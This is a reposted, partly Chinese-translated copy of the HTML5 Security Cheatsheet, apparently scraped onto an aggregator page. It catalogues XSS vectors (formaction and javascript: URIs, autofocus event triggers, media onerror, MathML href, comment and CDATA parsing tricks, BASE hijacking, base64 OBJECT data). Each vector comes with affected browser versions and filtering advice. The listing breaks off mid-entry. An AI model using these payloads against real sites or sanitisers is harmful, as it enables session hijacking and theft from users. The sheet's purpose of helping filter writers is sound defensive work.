HTML5 Security Cheatsheet xss cheat sheet

HTML5 Security CheatsheetWhat your browser does when you look away...

HTML5特性向量

通过formaction属性进行XSS - 需要用户进行交互 (1)#1test

这个向量展示了通过HTML5的form和formaction从外部劫持表单的一种方法.

<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>

不要让用户提交包含 "form" 和 "formaction"属性的标签.避免在form中出现id属性及提交按钮.

firefox 4.0

firefox 15.0

opera 10.5

opera 11.0

opera 12.0

opera mobile

chrome 10.0

chrome 23.0

safari 4.0.4

safari 5.1.7

xss

html5

opera

chrome

firefox

formaction

javascript

button

http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction

.mario

通过autofocus属性执行本身的focus事件#7test

这个向量是使焦点自动跳到输入元素上,触发焦点事件 - 无需用户交互

<input onfocus=write(1) autofocus>

检测用户提交的内容中是否含有"autofocus"属性

firefox 4.0

firefox 15.0

opera 9.0

opera 10.0

opera 11.0

opera 12.0

safari 4.0

safari 5.0

safari 5.1.7

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0

chrome 9.0

chrome 10.0

chrome 23.0

internet explorer 10.0

xss

autofocus

chrome

opera

http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602

http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control

Gareth

通过多个autofocus竞争焦点来触发blur事件#8test

这里我们有两个HTML input元素竞争焦点,但焦点到另一个input元素时,前面那个将会触发blur事件

<input onblur=write(1) autofocus><input autofocus>

检测用户提交的内容中是否含有"autofocus"属性

safari 4.0

safari 5.0

safari 5.1.7

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0

chrome 9.0

chrome 10.0

chrome 23.0

xss

autofocus

blur

chrome

safari

http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602

http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#autofocusing-a-form-control

.mario

通过<VIDEO>的poster属性执行Javascript#10test

Opera 10.5+的poster属性允许使用javascript: URI.这个bug在opera11中已修复

<video poster=javascript:alert(1)//></video>

确保VIDEO的poster属性是相对URI、http URI和MIME-typed正确的data URI

opera 10.5

opera 11.00

opera 11.01

xss

poster

video

opera

html5

.mario

通过autofocus触发<Body>的onscroll执行Javascript.#12test

这个向量是使用autofocus移开焦点的方式来移动滚动条,这样就触发了<BODY>的onscroll事件

<body onscroll=alert(1)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>

firefox 4.0

firefox 15.0

opera 9.0

opera 10.0

opera 11.0

opera 12.0

safari 4.0

safari 5.0

safari 5.1.7

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0

chrome 9.0

chrome 10.0

chrome 23.0

xss

autofocus

scroll

chrome

opera

http://www.w3.org/Bugs/Public/show_bug.cgi?id=9602

.mario

Form surveillance with onformchange, onforminput and form attributes#23test

Enter a value into the form element to see how "onforminput" and "onformchange" attributes can monitor <FORM> activity - even from outside the <FORM> via the form attribute on a <BUTTON> element.

<form id=test onforminput=alert(1)><input></form><button form=test onformchange=alert(2)>X</button>

Make sure users cannot submit markup including the form, "onformchange" and "onforminput" attributes. Do not apply <FORM> elements with an "id" attribute.

opera 10.5

opera 11.0

opera 12.0

opera mobile

surveillance

javascript

opera

html5

onforminput

onformchange

http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#broadcast-formchange-events

Skyphire, .mario

JavaScript execution via <VIDEO> and <SOURCE> tag (1)#55test

Opera 10.5+ and Chrome allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags

<video><source onerror="alert(1)">

Make sure user submitted <SOURCE> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.

opera 10.5

opera 11.0

opera 12.0

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0

chrome 9.0

chrome 10.0

chrome 25.0

firefox 4.0

firefox 15.0

xss

javascript

video

source

html5

opera

chrome

audio

.mario

JavaScript execution via <VIDEO> and <SOURCE> tag (2)#56test

Firefox 3.5+ allows error handlers in <VIDEO> tags when applied with a <SOURCE> tag. The same works for <AUDIO> tags.On Firefox 4+ the <SOURCE> tag is irrelevant to trigger the error event. This happens because of the implicit "src" attribute in <VIDEO> tag when the page has a number sign (#) in the URL.

<video onerror="alert(1)"><source></source></video>

Make sure user submitted <AUDIO> and <VIDEO> tags cannot contain event handlers or whitelist event handlers necessary for UI controls.

firefox 3.5

firefox 3.6

firefox 4.0

firefox 15.0

internet explorer 9.0

internet explorer 10.0

xss

javascript

video

source

html5

firefox

audio

.mario

XSS via formaction - requiring user interaction (2)#72test

A vector displaying the HTML5 "formaction" capabilities for form hijacking. Note that this variation does not use the "id" and "form" attributes to connect button and form.

<form><button formaction="javascript:alert(1)">X</button>

Don't allow users to submit markup containing "form" and "formaction" attributes or transform them to bogus attributes.

firefox 4.0

firefox 15.0

opera 10.5

opera 11.0

opera 12.0

opera mobile

chrome 10.0

chrome 23.0

safari 4.0.4

safari 5.1.7

internet explorer 10.0

xss

html5

opera

formaction

javascript

button

http://www.whatwg.org/specs/web-apps/current-work/multipage/association-of-controls-and-forms.html#attr-fs-formaction

.mario

Passive JavaScript execution via <BODY> and oninput attribute#86test

All browsers besides Internet Explorer 9↓ support the "oninput" event handler around form elements like the given <INPUT>. The event works for the form elements itself, the surrounding form and <BODY> as well as <HTML> tags.

<body oninput=alert(1)><input autofocus>

Do not whitelist "oninput" attributes in user submitted markup.

firefox 3.6

firefox 4.0

firefox 15.0

safari 4.0

safari 5.0

safari 5.1.7

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0

chrome 9.0

chrome 10.0

chrome 23.0

opera 9.0

opera 10.0

opera 11.0

opera 12.0

opera mobile

internet explorer 10.0

xss

javascript

html5

oninput

form

passive

event

Skyphire

Passive JavaScript execution via MathML on Firefox#130test

Modern Firefox versions allow usage of inline MathML. While other user agents don't support the href attribute for MathML elements (yet), Firefox does and thereby enables passive JavaScript execution. Note that supporting href for MathML elements is a feature - introduced with MathML 3. The same effect can be observed by using xlink:href. The statusline action further enables obfuscation of the actual link target - and in this example hides the JavaScript URI.

<math href="javascript:alert(1)">CLICKME</math><math><!-- up to FF 13 --><maction actiontype="statusline#http://google.com" xlink:href="javascript:alert(2)">CLICKME</maction><!-- FF 14+ --><maction actiontype="statusline" xlink:href="javascript:alert(3)">CLICKME<mtext>http://http://google.com</mtext></maction></math>

Do not allow users to submit unfiltered MathML content.

firefox 6

firefox 7

firefox 8

firefox 9

firefox 10

firefox 11

firefox 15

mathml

xss

inline

firefox

http://www.w3.org/Math/

https://bugzilla.mozilla.org/show_bug.cgi?id=534968

#87

.mario

Transparent overwriting of request-data using HTML5 "dirname" attributes#136test

Opera and Chrome support the HTML5 attribute "dirname", that can be used to have the browser communicate the text-flow direction of another input element by adding it to the server-sent request body. By injecting a "dirname" attribute in an existing form, an attacker can overwrite user input and thereby make it guessable for malicious purposes. The overwritten value would then be "ltr" or "rtl" - depending on the actual text-flow direction. The "dirname" attribute is not yet supported by Internet Explorer or Firefox.

<form action="" method="post"><input name="username" value="admin" /><input name="password" type="password" value="secret" /><input name="injected" value="injected" dirname="password" /><input type="submit"></form>

Avoid white-listing the "dirname" attribute in user generated content. The effects on existing forms are hard to predict and might cause privacy problems and information leaks.

opera 12.0

chrome 22.0

chrome 23.0

chrome 24.0

chrome 25.0

html5

dirname

privacy

http

form

infoleak

http://dev.w3.org/html5/spec/common-input-element-attributes.html#the-dirname-attribute

http://html5sec.org/dirname/

.mario

HTML4和一些老的向量

JavaScript execution via <FRAMESET> and onload#31test

This classic vector shows that several tags don't need a "src" attribute to fire onload events, such as <IFRAME>, <BODY> and <FRAMESET>.

<frameset onload=alert(1)>

Be sure to work with whitelists when allowing users to submit markup - else ancient tags like <FRAMESET> might be forgotten to filter and escape.

internet explorer 5.0

internet explorer 6.0

internet explorer 7.0

internet explorer 8.0

internet explorer 9.0

internet explorer 10.0

opera 8.x

opera 9.0

opera 10.0

opera 11.0

opera 12.0

opera mobile

firefox 1.x

firefox 2.0

firefox 3.0

firefox 4.0

firefox 15.0

chrome 3.0

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0

chrome 9.0

chrome 10.0

chrome 23.0

safari 3.0

safari 4.0

safari 5.0

safari 5.1.7

xss

javascript

frames

classic

html

onload

.mario

JavaScript execution via <TABLE> and background#32test

Opera 8-10.5+ as well as Internet Explorer 6 support JavaScript URIs for <TABLE> and some other tags' "background" attributes. This causes JavaScript execution without user interaction. The problem has been fixed in Opera 11.

<table background="javascript:alert(1)"></table>

In case evil attributes like event handlers are being filtered from user submitted markup make sure not to forget "background" - among others.

internet explorer 6.0

opera 8.x

opera 9.0

opera 10.0

opera 11.01

opera mobile

xss

javascript

background

classic

html

table

.mario

HTML comment parsing issues (1)#37test

This vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments.

<!--<img src="--><img src=x onerror=alert(1)//">

Make sure comments are not allowed in user submitted html. The markup should be checked for security issues after comments have been stripped out - not before.

internet explorer 5.0

internet explorer 6.0

internet explorer 7.0

internet explorer 8.0

internet explorer 9.0

internet explorer 10.0

opera 8.0

opera 9.0

opera 10.0

opera 11.0

opera 12.0

opera mobile

firefox 1.0

firefox 2.0

firefox 3.0

firefox 4.0

firefox 15.0

chrome 3.0

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0

chrome 9.0

chrome 10.0

chrome 23.0

safari 3.0

safari 4.0

safari 5.0

safari 5.1.7

xss

javascript

comment

parsing

attributes

sirdarckcat, .mario

HTML comment parsing issues (2)#38test

Besides <!---> the Internet Explorer allows to use <COMMENT> tags. The vector shows how comments are being parsed and what problems can arise in case user submitted HTML is allowed to contain comments. This example works up to IE 8 standards mode.

<comment><img src="</comment><img src=x onerror=alert(1)//">

Make sure <COMMENT> tags are not allowed in user submitted html. The markup should be checked for security issues after <COMMENT> tags have been stripped out or escaped - not before.

internet explorer 5.0

internet explorer 6.0

internet explorer 7.0

internet explorer 8.0

internet explorer 9.0

internet explorer 10.0

xss

javascript

comment

parsing

attributes

.mario

CDATA section parsing issues#39test

Firefox and Opera allow using CDATA section delimiters in HTML - in the stripped form "<![" as well as including padding like "<![CDATA[". This can cause problems for filter mechanisms since those delimiters can be used for massive obfuscation. Firefox 4 and Opera 11.60 have fixed the issue. However, modern browsers have a separate XML parsers for inline SVG or MathML, which allow to use the CDATA sections (including a little irregular shape).

<!-- up to Opera 11.52, FF 3.6.28 --><![><img src="]><img src=x onerror=alert(1)//"><!-- IE9+, FF4+, Opera 11.60+, Safari 4.0.4+, GC7+ --><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>

Make sure CDATA delimiters are not allowed in user submitted html. The markup should be checked for security issues after CDATA sections nd delimiters have been stripped out or escaped - not before.

opera 8.0

opera 9.0

opera 10.0

opera 11.0

opera 12.0

opera mobile

firefox 1.x

firefox 2.0

firefox 3.0

firefox 4.0

firefox 15.0

internet explorer 9.0

internet explorer 10.0

chrome 7.0

chrome 23.0

safari 4.0.4

safari 5.1.7

xss

javascript

cdata

parsing

attributes

math

svg

inline

LeverOne

Plaintext tags used for markup obfuscation#40test

This vector works on all tested user agents and shows how several filtering solutions can be tricked into accepting malicious HTML. A badly written filter will assume the error handler is part of the first image's "src" attribute and accept the incoming data.

<style><img src="</style><img src=x onerror=alert(1)//">

Don't rely on weak regular express for markup filtering. Use whitelists for allowed tags and rely on a filter solution based on a heavily tested tokenizer/parser.

internet explorer 5.0

internet explorer 6.0

internet explorer 7.0

internet explorer 8.0

internet explorer 9.0

internet explorer 10.0

opera 8.x

opera 9.0

opera 10.0

opera 11.0

opera 12.0

opera mobile

firefox 1.x

firefox 2.0

firefox 3.0

firefox 4.0

firefox 15.0

chrome 3.0

chrome 4.0

chrome 5.0

chrome 6.0

chrome 7.0

chrome 8.0
HTML5 Security Cheatsheet xss cheat sheet

chrome 9.0

chrome 10.0

chrome 23.0

safari 3.0

safari 4.0

safari 5.0

safari 5.1.7

xss

javascript

plaintext

tags

parsing

attributes

LeverOne

Error handler via empty list-style and load handler via empty content#41test

Opera 10.5+ and earlier versions fire an error event for <LI> tags in case the background URL via style attribute cannot be loaded. The same works with "list-style-image" too. On Opera 10.10 and earlier more tag/style combinations like background:url() and background-image:url() work as well. Also works combination like content:url(svg), but at the moment it is sensitive to events and <script> tags before and after.

<li style=list-style:url() onerror=alert(1)></li><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>

opera 8.0

opera 9.0

opera 10.0

opera 11.0

opera 12.0

opera mobile

xss

javascript

css

background

opera

onerror

content

LeverOne, .mario

Link hijacking via <BASE> and JavaScript URI#42test

<BASE> link hijacking with JavaScript URIs works on Internet Explorer, Opera (O8-10.5 in case the link URL starts with #) and Safari. User interaction is required to execute the JavaScript. The vector sometimes has to be changed slightly to work for all mentioned user agents. Opera 11 ships a more or less working fix, but this problem continues to exist in difficult to exploit forms though.

<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>

User submitted HTML should not allow usage of <BASE> tags. In case they are necessary no non-HTTP/non-relative URL schemes should be allowed.

opera 8.x

opera 9.0

opera 10.0

opera 10.63

safari 3.0

safari 4.0

safari 5.0

safari 5.1.7

internet explorer 5.5

internet explorer 6.0

internet explorer 7.0

internet explorer 8.0

xss

javascript

opera

internet explorer

base

hijacking

brainpillow, Gareth, .mario

JavaScript execution via <SCRIPT> for and event attributes#48test

Internet Explorer allow using <SCRIPT> tags with "for" and "event" attributes to bind event data to specific html elements. The two shown attribute values cause script execution without user interaction. Opera simply ignores these attributes.

<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>

opera 10.0

opera 11.0

opera 12.0

opera mobile

internet explorer 6.0

internet explorer 7.0

internet explorer 8.0

internet explorer 9.0

internet explorer 10.0

xss

javascript

opera

for

event

internet explorer

.mario

JavaScript execution via <OBJECT> DataURL attribute#49test

Internet Explorer 9 and - in some situations - earlier versions support the use of JavaScript URIs for the "dataurl" attribute of a TDC Object. The JavaScript will be executed without user any interaction.

<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>

internet explorer 6.0

internet explorer 7.0

internet explorer 8.0

internet explorer 9.0

xss

javascript

internet explorer

object

dataurl

TDS

http://msdn.microsoft.com/en-us/library/ms531356%28v=VS.85%29.aspx#Understanding_the_TDC_Object_Model

.mario

JavaScript execution via <OBJECT> data#50test

Almost all browsers supporting data URIs allow executing JavaScript via crafted <OBJECT> "data" attribute value - even if base64 encoded.

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

Make sure user submitted HTML cannot contain <OBJECT> tags or only whitelisted <OBJECT> "data" values.

opera 8.x  

爱华网本文地址 » http://www.413yy.cn/a/25101011/51528.html

更多阅读

如何在html中调用js代码 html5如何调用js文件

如何在html中调用js代码——简介js代码即为javascript代码,可直接在客户端解释执行,在html中调用js代码的方法主要有两种:一、将javascript直接写在html文件中,然后在html中调用js函数等;二、将js代码写一个文件中,然后在html中引用该文件

破解CE(CheatEngine)迷题 cheat engine 6.6

Cheat Engine,作弊引擎,瞧这名字起得叫一实诚的,比较出名的一款开源免费的游戏修改工具,用于修改游戏血量,装备啥的。它有一个自带的教程,有9关迷题,把这9关解了,CE的用法基本也就会了。话不多说,到http://cheatengine.org/ 下了个最新版的v

声明:《HTML5 Security Cheatsheet xss cheat sheet》为网友偽裝分享!如侵犯到您的合法权益请联系我们删除